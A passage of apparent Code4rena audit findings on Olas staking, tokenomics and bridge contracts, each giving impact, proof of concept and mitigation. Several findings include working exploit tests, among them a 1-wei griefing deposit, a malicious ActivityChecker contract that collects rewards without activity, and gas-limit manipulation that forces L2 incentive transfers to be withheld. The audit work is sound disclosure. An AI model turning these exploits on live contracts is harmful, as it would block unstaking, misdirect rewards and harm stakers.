
        // Since there is no returned message sequence, use the staking batch nonce
        sequence = stakingBatchNonce;
    }

This is incorrect. In Optimism, the cross-chain gas is instead paid as follows:

  • For L1 -> L2 transactions: the L1 gas is burnt in the Optimism bridge in Optimism's ResourceMetering to pay for the cross-chain gas in L2

  • For L2 -> L1 transactions: the user pays for the L1 gas by executing the functions proveWithdrawalTransaction and finalizeWithdrawalTransaction in OptimismPortal on the L1 to complete the cross-chain transactions

So in reality, there is no need to pass ETH to the CrossDomainMessenger to pay for the cross-chain gas.

This affects the OptimismTargetDispenserL2 contract as well.

Impact

Using the contracts as intended will cause ETH to be unnecessarily sent to, and stuck in, OptimismDepositProcessorL1 and OptimismTargetDispenserL2, based on the misunderstanding that this ETH pays for the cross-chain gas.

Tools Used

Manual

Recommended Mitigation Steps

Remove the cost variables from the Optimism-related contracts.
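
A sketch of what this could look like in OptimismDepositProcessorL1::_sendMessage, shown as a diff against the snippet above (BRIDGE_PAYLOAD_LENGTH, the msg.value check, and the OptimismTargetDispenserL2 counterpart would need matching updates; this is an illustration, not a drop-in patch):

-        // Decode cost related data
-        (uint256 cost, uint256 gasLimitMessage) = abi.decode(bridgePayload, (uint256, uint256));
-        // Check for zero values
-        if (cost == 0 || gasLimitMessage == 0) {
+        // Decode the message gas limit only
+        uint256 gasLimitMessage = abi.decode(bridgePayload, (uint256));
+        if (gasLimitMessage == 0) {
             revert ZeroValue();
         }

         // Send message to L2
-        IBridge(l1MessageRelayer).sendMessage{value: cost}(l2TargetDispenser, data, uint32(gasLimitMessage));
+        IBridge(l1MessageRelayer).sendMessage(l2TargetDispenser, data, uint32(gasLimitMessage));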

Assessed type

Other

Griefing attack on unstaking services

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L818

Vulnerability details

Impact

A malicious user can execute a griefing attack to prevent service owners from unstaking when the available reward is zero.

Proof of Concept

The owner of a service is allowed to unstake if the service has been staked long enough (more than minStakingDuration) or if the available reward is zero.

    function unstake(uint256 serviceId) external returns (uint256 reward) {
        //....

        uint256 ts = block.timestamp - tsStart;
        if (ts <= minStakingDuration && availableRewards > 0) {
            revert NotEnoughTimeStaked(serviceId, ts, minStakingDuration);
        }

        //.....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L818

This provides an opportunity for a malicious user to mount a griefing attack.

Suppose serviceA has been staked (for no more than minStakingDuration) and the service multisig has made transactions, so some rewards should be allocated to this multisig (assuming isRatioPass returns true). The function checkpointAndClaim is therefore called to claim the rewards; it first calls checkpoint() to calculate the rewards and then transfers them to the multisig.

    function checkpointAndClaim(uint256 serviceId) external returns (uint256) {
        return _claim(serviceId, true);
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L884

In the function checkpoint, if available rewards is less than or equal to the total rewards that should be allocated to services, then the available rewards will be updated to zero.

    function checkpoint() public returns (
        uint256[] memory,
        uint256[][] memory,
        uint256[] memory,
        uint256[] memory,
        uint256[] memory evictServiceIds
    )
    {
        //.....
                    if (totalRewards > lastAvailableRewards) {
                        //....
                        lastAvailableRewards = 0;
                        //....
                    } else {
                        //....
                    }
                    availableRewards = lastAvailableRewards;
        //.....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L645

As a result of calling the function checkpointAndClaim, the availableRewards is set to zero, and the service multisig receives its allocated reward.

Based on the explanation above, the service owner can now unstake (because availableRewards = 0). But before the owner unstakes, the malicious user transfers 1 wei to the StakingNativeToken contract, or calls deposit(1) on the StakingToken contract to transfer the smallest unit of the staking token. By doing so, availableRewards becomes nonzero. As a result, the service owner cannot unstake and must wait for minStakingDuration to be allowed to unstake.

    receive() external payable {
        //.....
        uint256 newAvailableRewards = availableRewards + msg.value;

        //......
        availableRewards = newAvailableRewards;

        //....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingNativeToken.sol#L39

    function deposit(uint256 amount) external {
        //.....
        uint256 newAvailableRewards = availableRewards + amount;

        //.....
        availableRewards = newAvailableRewards;

        //....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingToken.sol#L115

Test Case

In the following test, after checkpointAndClaim is called, availableRewards becomes zero (meaning all the available rewards of 0.01 ETH are allocated to the service). The service owner is therefore allowed to unstake the service even though it has been staked for less than minStakingDuration (minStakingDuration = 30 and livenessPeriod = 10). But the attacker deposits 1 wei to make availableRewards nonzero, so the unstake call will revert.

        it("attacker prevents from unstaking", async function () {

            let attacker = signers[3];

            // Take a snapshot of the current state of the blockchain
            const snapshot = await helpers.takeSnapshot();

            // Deposit to the contract
            await deployer.sendTransaction({ to: stakingNativeToken.address, value: ethers.utils.parseEther("0.01") });

            // Approve services
            await serviceRegistry.approve(stakingNativeToken.address, serviceId);

            // Stake the service
            await stakingNativeToken.stake(serviceId);

            // Get the service multisig contract
            const service = await serviceRegistry.getService(serviceId);
            const multisig = await ethers.getContractAt("GnosisSafe", service.multisig);

            // Make transactions by the service multisig
            let nonce = await multisig.nonce();
            let txHashData = await safeContracts.buildContractCall(multisig, "getThreshold", [], nonce, 0, 0);
            let signMessageData = await safeContracts.safeSignMessage(agentInstances[0], multisig, txHashData, 0);
            await safeContracts.executeTx(multisig, txHashData, [signMessageData], 0);

            // Increase the time for the liveness period
            await helpers.time.increase(livenessPeriod);

            // Call claim (calls checkpoint as well)
            await stakingNativeToken.checkpointAndClaim(serviceId);

            console.log("available rewards before the attack: ", await stakingNativeToken.availableRewards());

            // Attacker deposits 1 wei to the contract
            await attacker.sendTransaction({ to: stakingNativeToken.address, value: 1 });

            console.log("available rewards after the attack: ", await stakingNativeToken.availableRewards());

            // It is not possible to unstake. The service owner must wait for minStakingDuration
            await expect(stakingNativeToken.unstake(serviceId)).to.be.reverted;

            // Restore a previous state of blockchain
            snapshot.restore();
        });

The result is:

  Staking
    Staking and unstaking
available rewards before the attack:  BigNumber { value: "0" }
available rewards after the attack:  BigNumber { value: "1" }
      ✔ attacker prevents from unstaking

Tools Used

Recommended Mitigation Steps

There should be a minimum deposit requirement to make this griefing attack expensive for the malicious user.

    receive() external payable {
        //.....

        require(msg.value >= 0.1 ether, "too small deposit");

        //.....
    }

Assessed type

Context

Future staking instances may be added to the nominees in advance and the owner then induced to remove them from the nominees

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L324
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingFactory.sol#L141
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L586

Vulnerability details

Impact

Because the addresses of staking instances deployed by the staking factory can be predicted in advance, and the VoteWeighting contract does not validate nominees when they are added, a malicious actor can predict some future staking instance addresses, add them as nominees in advance, and then induce administrators to remove those nominees through abnormal behavior or other means. Since the removal of a nominee cannot be undone, this may result in future staking instances not receiving any incentive rewards.

Proof of Concept

  1. StakingFactory uses the create2 method to deploy new instances, which allows all future deployment contract addresses to be predicted:
    https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingFactory.sol#L141
    function getProxyAddressWithNonce(address implementation, uint256 localNonce) public view returns (address) {
        // Get salt based on chain Id and nonce values
        bytes32 salt = keccak256(abi.encodePacked(block.chainid, localNonce));

        // Get the deployment data based on the proxy bytecode and the implementation address
        bytes memory deploymentData = abi.encodePacked(type(StakingProxy).creationCode,
            uint256(uint160(implementation)));

        // Get the hash forming the contract address
        bytes32 hash = keccak256(
            abi.encodePacked(
                bytes1(0xff), address(this), salt, keccak256(deploymentData)
            )
        );

        return address(uint160(uint256(hash)));
    }
  2. VoteWeighting does not impose any restrictions on adding nominees, allowing malicious actors to add undeployed staking instance contracts as nominees in advance:
    https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L324C1-L344C6
    function addNomineeEVM(address account, uint256 chainId) external {
        // Check for the zero address
        if (account == address(0)) {
            revert ZeroAddress();
        }

        // Check for zero chain Id
        if (chainId == 0) {
            revert ZeroValue();
        }

        // Check for the chain Id overflow
        if (chainId > MAX_EVM_CHAIN_ID) {
            revert Overflow(chainId, MAX_EVM_CHAIN_ID);
        }

        Nominee memory nominee = Nominee(bytes32(uint256(uint160(account))), chainId);

        // Record nominee instance
        _addNominee(nominee);
    }
  3. Once the malicious party successfully induces the administrator to remove the nominee, new instances deployed from the StakingFactory contract in the future will not receive incentive rewards (the removal of a nominee is irreversible):
    https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L586
   function removeNominee(bytes32 account, uint256 chainId) external {

Tools Used

Manual review

Recommended Mitigation Steps

Set up a method to restore removed nominees to avoid such attacks, as sketched below.
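
A minimal sketch of such a recovery path (the function name addBackNominee and the mapRemovedNominees bookkeeping are hypothetical; the Nominee struct, _addNominee and the errors are from the existing contract):

function addBackNominee(bytes32 account, uint256 chainId) external {
    // Check for the contract ownership
    if (msg.sender != owner) {
        revert OwnerOnly(owner, msg.sender);
    }

    Nominee memory nominee = Nominee(account, chainId);
    bytes32 nomineeHash = keccak256(abi.encode(nominee));

    // Only allow restoring a nominee that was previously removed
    // (mapRemovedNominees is assumed bookkeeping written by removeNominee)
    if (!mapRemovedNominees[nomineeHash]) {
        revert NomineeDoesNotExist(account, chainId);
    }
    mapRemovedNominees[nomineeHash] = false;

    // Re-register the nominee so its staking instance can receive weight again
    _addNominee(nominee);
}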

Assessed type

Other

Function Tokenomics.trackServiceDonations uses old config values

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Tokenomics.sol#L910-L912
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Tokenomics.sol#L639-L694

Vulnerability details

Impact

  • Old values of veOLASThreshold, rewardUnitFraction, topUpUnitFraction are used in calculations
  • A service unit might not receive its OLAS top-up
  • A malicious user can front-run the trackServiceDonations function and enjoy a lower threshold.

Proof of Concept

In contract Tokenomics, the state variable veOLASThreshold is used to decide whether a service is eligible for a top-up:

bool topUpEligible;
            if (incentiveFlags[2] || incentiveFlags[3]) {
                address serviceOwner = IToken(serviceRegistry).ownerOf(serviceIds[i]);
                topUpEligible = (IVotingEscrow(ve).getVotes(serviceOwner) >= veOLASThreshold  ||
                    IVotingEscrow(ve).getVotes(donator) >= veOLASThreshold) ? true : false;
            }

To update this variable, the owner of Tokenomics calls changeTokenomicsParameters. This function does not set the new value of veOLASThreshold right away; instead it stores the new threshold in the variable nextVeOLASThreshold, which is assigned to veOLASThreshold when someone calls checkpoint after the current epoch ends.

However, the trackServiceDonations function does not call checkpoint to update this value when the epoch ends. Therefore, trackServiceDonations still uses the old value of veOLASThreshold, resulting in wrong calculations. If the new threshold is bigger than the old one, a user can enjoy the lower threshold by front-running (calling trackServiceDonations before anyone calls checkpoint). If the new threshold is smaller than the old one, users might lose their eligibility for the top-up because the threshold is not updated.
For example:

  • If the epochLen = 30 days and veOLASThreshold = 10_000e18
  • On day 0 the contract Tokenomics is deployed
  • On day 15 the owner calls changeTokenomicsParameters with a new ve threshold value of 10_000e18 - 1; nextVeOLASThreshold is set to 10_000e18 - 1, but veOLASThreshold still equals 10_000e18
  • On day 31, when the first epoch ends, someone donates to a service and eventually trackServiceDonations is called. Suppose their current votes equal 10_000e18 - 1; the service will not receive any top-up because the threshold is still 10_000e18 (not updated).

This also happens with other parameters like topUpUnitFraction and rewardUnitFraction in the _finalizeIncentivesForUnitId function:

function _finalizeIncentivesForUnitId(uint256 epochNum, uint256 unitType, uint256 unitId) internal {
        // Gets the overall amount of unit rewards for the unit's last epoch
        // The pendingRelativeReward can be zero if the rewardUnitFraction was zero in the first place
        // Note that if the rewardUnitFraction is set to zero at the end of epoch, the whole pending reward will be zero
        // reward = (pendingRelativeReward * rewardUnitFraction) / 100
        uint256 totalIncentives = mapUnitIncentives[unitType][unitId].pendingRelativeReward;
        if (totalIncentives > 0) {
            totalIncentives *= mapEpochTokenomics[epochNum].unitPoints[unitType].rewardUnitFraction;
            // Add to the final reward for the last epoch
            totalIncentives = mapUnitIncentives[unitType][unitId].reward + totalIncentives / 100;
            mapUnitIncentives[unitType][unitId].reward = uint96(totalIncentives);
            // Setting pending reward to zero
            mapUnitIncentives[unitType][unitId].pendingRelativeReward = 0;
        }

        // Add to the final top-up for the last epoch
        totalIncentives = mapUnitIncentives[unitType][unitId].pendingRelativeTopUp;
        // The pendingRelativeTopUp can be zero if the service owner did not stake enough veOLAS
        // The topUpUnitFraction was checked before and if it were zero, pendingRelativeTopUp would be zero as well
        if (totalIncentives > 0) {
            // Summation of all the unit top-ups and total amount of top-ups per epoch
            // topUp = (pendingRelativeTopUp * totalTopUpsOLAS * topUpUnitFraction) / (100 * sumUnitTopUpsOLAS)
            totalIncentives *= mapEpochTokenomics[epochNum].epochPoint.totalTopUpsOLAS;
            totalIncentives *= mapEpochTokenomics[epochNum].unitPoints[unitType].topUpUnitFraction;
            uint256 sumUnitIncentives = uint256(mapEpochTokenomics[epochNum].unitPoints[unitType].sumUnitTopUpsOLAS) * 100;
            totalIncentives = mapUnitIncentives[unitType][unitId].topUp + totalIncentives / sumUnitIncentives;
            mapUnitIncentives[unitType][unitId].topUp = uint96(totalIncentives);
            // Setting pending top-up to zero
            mapUnitIncentives[unitType][unitId].pendingRelativeTopUp = 0;
        }
    }

Depending on the specific situation, a user could suffer losses due to the use of old values in the calculation, or it could be beneficial for them to front-run before anyone calls checkpoint.

Below is a POC for the above examples; save these 2 test cases to the file tokenomics/test/Tokenomics.js and run them using the command:
npx hardhat test test/Tokenomics.js --grep VeOLASThreshold

it("VeOLASThreshold is not updated for service donation - checkpoint call", async () => {
            // Only treasury can access the function, so let's change it for deployer here
            await tokenomics.changeManagers(deployer.address, AddressZero, AddressZero);
            await ve.setWeightedBalance("9999999999999999999999"); // 10_000e18 - 1
            await ve.createLock(deployer.address);
            console.log(`Current veOLASThreshold ${await tokenomics.veOLASThreshold()}`)

            // Reduce veOLASThreshold to 10_000e18 - 1 (equal to donator votes)
            await tokenomics.changeTokenomicsParameters(
              0, 0, 0 ,0, "9999999999999999999999"
            );
            // Move time to next epoch
            await helpers.time.increase(epochLen);
            await tokenomics.checkpoint();
            console.log(`Current veOLASThreshold ${await tokenomics.veOLASThreshold()}`)

            await tokenomics.connect(deployer).trackServiceDonations(deployer.address, [1, 2],
                ["1000000000000000000000", "1000000000000000000000"], "2000000000000000000000");

            let incentiveBalances = await tokenomics.mapUnitIncentives(0, 1);
            console.log(incentiveBalances.pendingRelativeTopUp);

        });
        it("VeOLASThreshold is not updated for service donation - no checkpoint call", async () => {
            // Only treasury can access the function, so let's change it for deployer here
            await tokenomics.changeManagers(deployer.address, AddressZero, AddressZero);
            await ve.setWeightedBalance("9999999999999999999999"); // 10_000e18 - 1
            await ve.createLock(deployer.address);
            console.log(`Current veOLASThreshold ${await tokenomics.veOLASThreshold()}`)

            // Reduce veOLASThreshold to 10_000e18 - 1 (equal to donator votes)
            await tokenomics.changeTokenomicsParameters(
              0, 0, 0 ,0, "9999999999999999999999"
            );
            // Move time to next epoch
            await helpers.time.increase(epochLen);
            //await tokenomics.checkpoint();
            console.log(`Current veOLASThreshold ${await tokenomics.veOLASThreshold()}`)

            await tokenomics.connect(deployer).trackServiceDonations(deployer.address, [1, 2],
                ["1000000000000000000000", "1000000000000000000000"], "2000000000000000000000");

            let incentiveBalances = await tokenomics.mapUnitIncentives(0, 1);
            console.log(incentiveBalances.pendingRelativeTopUp);

        });

In the first test case, checkpoint is called before trackServiceDonations, so pendingRelativeTopUp > 0.
In the second test case, checkpoint is not called and pendingRelativeTopUp = 0.

Tools Used

Manual review

Recommended Mitigation Steps

The trackServiceDonations function should call checkpoint to update the threshold before comparing the threshold against the current votes, as sketched below.
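
A minimal sketch of the suggested ordering, assuming the existing trackServiceDonations signature (whether calling checkpoint from this context is safe and gas-acceptable is for the team to verify):

function trackServiceDonations(
    address donator,
    uint256[] memory serviceIds,
    uint256[] memory amounts,
    uint256 donationETH
) external {
    // Settle the epoch first so veOLASThreshold and the unit fractions are current
    checkpoint();

    // ... existing donation tracking logic follows, now using the refreshed parameters
}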

Assessed type

Invalid Validation

Staking contract can distribute rewards to multisig without activity

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/e2a8bc31d2769bfb578a06cc64919ad369a82c08/registries/contracts/staking/StakingFactory.sol#L168-L216
https://github.com/code-423n4/2024-05-olas/blob/e2a8bc31d2769bfb578a06cc64919ad369a82c08/registries/contracts/staking/StakingBase.sol#L278-L361
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingBase.sol#L406-L422

Vulnerability details

Relevant code: StakingFactory::createStakingInstance, StakingBase::_initialize, StakingBase::_checkRatioPass

Description

A Staking contract can be created permissionlessly by using the StakingFactory:

function createStakingInstance(
    address implementation,
    bytes memory initPayload
) external returns (address payable instance)

The first parameter is a whitelisted staking implementation and the second one encodes a function call to an initialize() function containing StakingParams.

One of the vital parameters for the proper operation of the Staking contract is activityChecker. Its responsibility is to make sure the staked service has been active throughout the last epoch.

// Get the ratio pass activity check
activityData = abi.encodeCall(IActivityChecker.isRatioPass, (currentNonces, lastNonces, ts));
(success, returnData) = activityChecker.staticcall(activityData);

While other params are checked for their validity, activityChecker can be arbitrarily set by the caller. This opens up the possibility for a malicious actor to supply their own implementation of activityChecker that behaves in any way they like. Since all the validity checks pass, the newly created Staking contract can be voted for and used in the protocol.

Root Cause

Lack of validation for the activityChecker address when creating Staking contracts.

Impact

A malicious actor can permissionlessly create a Staking contract in which certain multisigs always pass the activity check, allowing them to collect rewards without engaging in any blockchain activity. This breaks the core protocol invariant of paying only services that do real work.

PoC

The following PoC demonstrates how a malicious ActivityChecker contract can be inserted in StakingParam and manipulate the Staking contract to issue rewards, even though no transactions were done by the multisig.

Place the following contract at contracts/test/MaliciousActivityChecker.sol:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

interface IActivityChecker {
    function getMultisigNonces(address multisig) external view returns (uint256[] memory nonces);

    function isRatioPass(
        uint256[] memory curNonces,uint256[] memory lastNonces, uint256 ts
    ) external view returns (bool ratioPass);
}

contract MaliciousActivityChecker is IActivityChecker {
    IActivityChecker original;
    address public owner;
    address multisig;

    constructor(address _original) {
        original = IActivityChecker(_original);
        owner = msg.sender;
        multisig = address(0);
    }

    function setMultisig(address _multisig) public {
        require(msg.sender == owner, "MaliciousActivityChecker: not owner");
        multisig = _multisig;
    }

    function getMultisigNonces(address _multisig) external view returns (uint256[] memory nonces) {
        if (_multisig == multisig) {
            nonces = new uint256[](1);
            nonces[0] = 10_000;
        } else {
            nonces = original.getMultisigNonces(_multisig);
        }
    }

    function isRatioPass(
        uint256[] memory curNonces,uint256[] memory lastNonces, uint256 ts
    ) external view returns (bool ratioPass) {
        if (curNonces[0] == 10_000 && lastNonces[0] == 10_000) {
            return true;
        } else {
            return original.isRatioPass(curNonces, lastNonces, ts);
        }
    }

}

Add the following test in ServiceStaking.js:

    context("StakingRewards attack", function () {
        it("Should distribute rewards without multisig activity", async function () {
            const maliciousCheckerFactory = await ethers.getContractFactory(
                'MaliciousActivityChecker',
            );
            let maliciousActivityChecker = await maliciousCheckerFactory.deploy(stakingActivityChecker.address);
            expect(await maliciousActivityChecker.owner()).to.eq(deployer.address);

            serviceParams.activityChecker = maliciousActivityChecker.address;

            const StakingNativeToken = await ethers.getContractFactory("StakingNativeToken");
            stakingImplementation = await StakingNativeToken.deploy();
            let initPayload = stakingImplementation.interface.encodeFunctionData("initialize",
                [serviceParams]);
            const stakingAddress = await stakingFactory.callStatic.createStakingInstance(
                stakingImplementation.address, initPayload);
            await stakingFactory.createStakingInstance(stakingImplementation.address, initPayload);
            stakingNativeToken = await ethers.getContractAt("StakingNativeToken", stakingAddress);
            
            // Staking contract successfully initialized with malicious activity checker
            expect(await stakingNativeToken.activityChecker()).to.eq(maliciousActivityChecker.address);

            // Get the service multisig contract
            let service = await serviceRegistry.getService(serviceId);
            const multisig = await ethers.getContractAt("GnosisSafe", service.multisig);
            expect(await multisig.nonce()).to.eq(0);
            console.log("multisig.nonce: ", await multisig.nonce()); // nonce is 0
            
            await maliciousActivityChecker.setMultisig(service.multisig);

            // Deposit to the contract
            await deployer.sendTransaction({to: stakingNativeToken.address, value: ethers.utils.parseEther("1")});

            // Approve services
            await serviceRegistry.approve(stakingNativeToken.address, serviceId);

            // Stake the service
            await stakingNativeToken.stake(serviceId);

            await helpers.time.increase(maxInactivity);

            // Call the checkpoint at this time
            await stakingNativeToken.checkpoint();

            // Checking the nonce info
            let serviceInfo = await stakingNativeToken.getServiceInfo(serviceId);
            const serviceInfoNonce = serviceInfo.nonces[0];
            expect(serviceInfoNonce).to.eq(10000);   // manipulated nonce
            expect(await multisig.nonce()).to.eq(0); // actual nonce in multisig is still 0

            const reward = await stakingNativeToken.calculateStakingReward(serviceId);
            console.log("Reward: ", reward);
            expect(reward).to.greaterThan(0);
            
            const balanceBefore = await ethers.provider.getBalance(multisig.address);
            await stakingNativeToken.claim(serviceId);
            const balanceAfter = await ethers.provider.getBalance(multisig.address);
            expect(balanceAfter).gt(balanceBefore);
        });
    });

Suggested Mitigation

There is already a contract responsible for verifying the validity of the Staking contract instance - StakingVerifier. The verifyInstance function should be modified to also check if the correct ActivityChecker has been set:

address activityChecker;
...
function verifyInstance(address instance, address implementation) external view returns (bool) {
	...
	if (IStaking(instance).activityChecker() != activityChecker) {
	    return false;
	}
}

Assessed type

Invalid Validation

Exploiting gas limit manipulation in staking incentive distribution on L2

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L160

Vulnerability details

Impact

An attacker can provide a specific gas limit when claiming staking incentives so that, on L2, the distribution to the staking target fails and the OLAS amount is held as withheldAmount.

Proof of Concept

When claiming staking incentives, the parameter bridgePayload is provided by the user. The flow of function calls is as follows (assuming the bridging protocol is Optimism):

On L1:

Dispenser::claimStakingIncentives ==> Dispenser::_distributeStakingIncentives ==> DefaultDepositProcessorL1::sendMessage ==> OptimismTargetDispenserL2::_sendMessage
    function claimStakingIncentives(
        uint256 numClaimedEpochs,
        uint256 chainId,
        bytes32 stakingTarget,
        bytes memory bridgePayload
    ) external payable {
        //....
        _distributeStakingIncentives(chainId, stakingTarget, stakingIncentive, bridgePayload, transferAmount);
        //....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1041

    function _distributeStakingIncentives(
        uint256 chainId,
        bytes32 stakingTarget,
        uint256 stakingIncentive,
        bytes memory bridgePayload,
        uint256 transferAmount
    ) internal {
        //....
        if (chainId <= MAX_EVM_CHAIN_ID) {
            address stakingTargetEVM = address(uint160(uint256(stakingTarget)));
            IDepositProcessor(depositProcessor).sendMessage{value:msg.value}(stakingTargetEVM, stakingIncentive,
                bridgePayload, transferAmount);
        } else {
            // Send to non-EVM
            IDepositProcessor(depositProcessor).sendMessageNonEVM{value:msg.value}(stakingTarget,
                stakingIncentive, bridgePayload, transferAmount);
        }
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L423-L431

    function sendMessage(
        address target,
        uint256 stakingIncentive,
        bytes memory bridgePayload,
        uint256 transferAmount
    ) external virtual payable {
        //....
        uint256 sequence = _sendMessage(targets, stakingIncentives, bridgePayload, transferAmount);
        //...
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultDepositProcessorL1.sol#L150

    function _sendMessage(uint256 amount, bytes memory bridgePayload) internal override {
        //...
        (uint256 cost, uint256 gasLimitMessage) = abi.decode(bridgePayload, (uint256, uint256));

        if (gasLimitMessage < GAS_LIMIT) {
            gasLimitMessage = GAS_LIMIT;
        }

        if (gasLimitMessage > MAX_GAS_LIMIT) {
            gasLimitMessage = MAX_GAS_LIMIT;
        }

        IBridge(l2MessageRelayer).sendMessage{value: cost}(l1DepositProcessor, data, uint32(gasLimitMessage));
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/OptimismTargetDispenserL2.sol#L63

This shows that the gas limit provided by the user as a parameter will be forwarded to the destination contract on L2. Note that the minimum allowed value is 300_000.

uint256 public constant GAS_LIMIT = 300_000;

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L67

On L2, the flow of function calls is as follows:

On L2:

OptimismTargetDispenserL2::receiveMessage ==> DefaultTargetDispenserL2::_receiveMessage ==> DefaultTargetDispenserL2::_processData ==> StakingFactory::verifyInstanceAndGetEmissionsAmount
    function receiveMessage(bytes memory data) external payable {
        // Check for the target dispenser address
        address l1Processor = IBridge(l2MessageRelayer).xDomainMessageSender();

        // Process the data
        _receiveMessage(msg.sender, l1Processor, data);
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/OptimismTargetDispenserL2.sol#L96

    function _receiveMessage(
        address messageRelayer,
        address sourceProcessor,
        bytes memory data
    ) internal virtual {
        //....
        _processData(data);
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L242

    function _processData(bytes memory data) internal {
        //....
        bytes memory verifyData = abi.encodeCall(IStakingFactory.verifyInstanceAndGetEmissionsAmount, target);
        (bool success, bytes memory returnData) = stakingFactory.call(verifyData);
        //....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L160

    function verifyInstanceAndGetEmissionsAmount(address instance) external view returns (uint256 amount) {
        // Verify the proxy instance
        bool success = verifyInstance(instance);

        if (success) {
            // Get the proxy instance emissions amount
            amount = IStaking(instance).emissionsAmount();

            // If there is a verifier, adjust the amount
            address localVerifier = verifier;
            if (localVerifier != address(0)) {
                // Get the max possible emissions amount
                uint256 maxEmissions = IStakingVerifier(localVerifier).getEmissionsAmountLimit(instance);
                // Limit excessive emissions amount
                if (amount > maxEmissions) {
                    amount = maxEmissions;
                }
            }
        }
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingFactory.sol#L294

This shows that the amount of gas provided by the user (as input parameter on L1) will be forwarded to the function OptimismTargetDispenserL2::receiveMessage. Suppose that the remaining gas before calling the function StakingFactory::verifyInstanceAndGetEmissionsAmount (before line 161) is X.
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L161

So, per the EIP-150 rule, (63/64) * X will be forwarded to the StakingFactory.

If the amount of gas used in StakingFactory::verifyInstanceAndGetEmissionsAmount is larger than (63/64) * X, the boolean success will be false and roughly (1/64) * X will be left for executing the remaining code.

(bool success, bytes memory returnData) = stakingFactory.call(verifyData);

Running a simple test shows that the gas used from line 162 to line 213 when success = false is around 14_000. This figure assumes the two storage variables stakingBatchNonce and withheldAmount are already nonzero (changing them from zero to nonzero would consume more gas).

Moreover, the amount of gas consumed by StakingFactory::verifyInstanceAndGetEmissionsAmount is not known in advance, because it makes an external call to the instance, which can have a customized implementation.

This gives an attacker the opportunity to force the distribution to staking targets that are heavy gas consumers during verification to fail, so the transferred OLAS amount is always held in DefaultTargetDispenserL2 as withheldAmount. The attack is as follows:

  • The attacker notices that the verification of a staking target consumes more than 63 * 14_000 = 882_000 gas. So, the attacker calls the function claimStakingIncentives with the parameter bridgePayload equal to:
gasLimitMessage = 1500 + 64 * 14_000 = 897_500
bridgePayload = abi.encode(cost, gasLimitMessage);

Where 1500 is the required gas until line 161.
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L161

  • By doing so, the amount of gas left before calling StakingFactory::verifyInstanceAndGetEmissionsAmount at line 161 would be almost equal to X = 64 * 14_000.
  • During the call, (63/64) * X = 882_000 would be forwarded to the StakingFactory. If the amount of gas consumed there is more than that, the low-level call fails and success = false. Thus, limitAmount = 0, the OLAS amount is not transferred to the target, and it is held as withheldAmount.
           uint256 limitAmount;
           // If the function call was successful, check the return value
           if (success && returnData.length == 32) {
               limitAmount = abi.decode(returnData, (uint256));
           }

           // If the limit amount is zero, withhold OLAS amount and continue
           if (limitAmount == 0) {
               // Withhold OLAS for further usage
               localWithheldAmount += amount;
               emit AmountWithheld(target, amount);

               // Proceed to the next target
               continue;
           }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L163-L177

  • Then, (1/64) * X = 14_000 would be left for the rest of the code, which is enough to be executed properly.

In summary, by observing the gas required to verify a staking target, the attacker can choose a gas limit that makes the staking incentive distribution fail, so the OLAS token amount is held as withheldAmount.

Test Case

In the following test case:

  • First, a message is sent to L2 with funds for a wrong address. This increases withheldAmount and stakingBatchNonce to 100 and 1, respectively. It is not part of the attack scenario; it just makes those storage variables nonzero (to keep the scenario simpler and more realistic).
  • Then, a message is sent to L2 with funds for the correct address of a staking target, with a provided gas limit of 900_000, because the attacker has noticed that verifying this instance consumes more than (900_000 - 1500) * (63/64) gas. As a result, the distribution on L2 fails and the transferred OLAS is held in withheldAmount. Note that if the attacker provided 1_100_000 gas instead, the OLAS amount would be distributed successfully (success = true).
  • The result shows that withheldAmount increases from 100 to 200, meaning that sending the message with 900_000 gas makes the OLAS transfer to the staking target fail, and the amount is indeed added to withheldAmount.
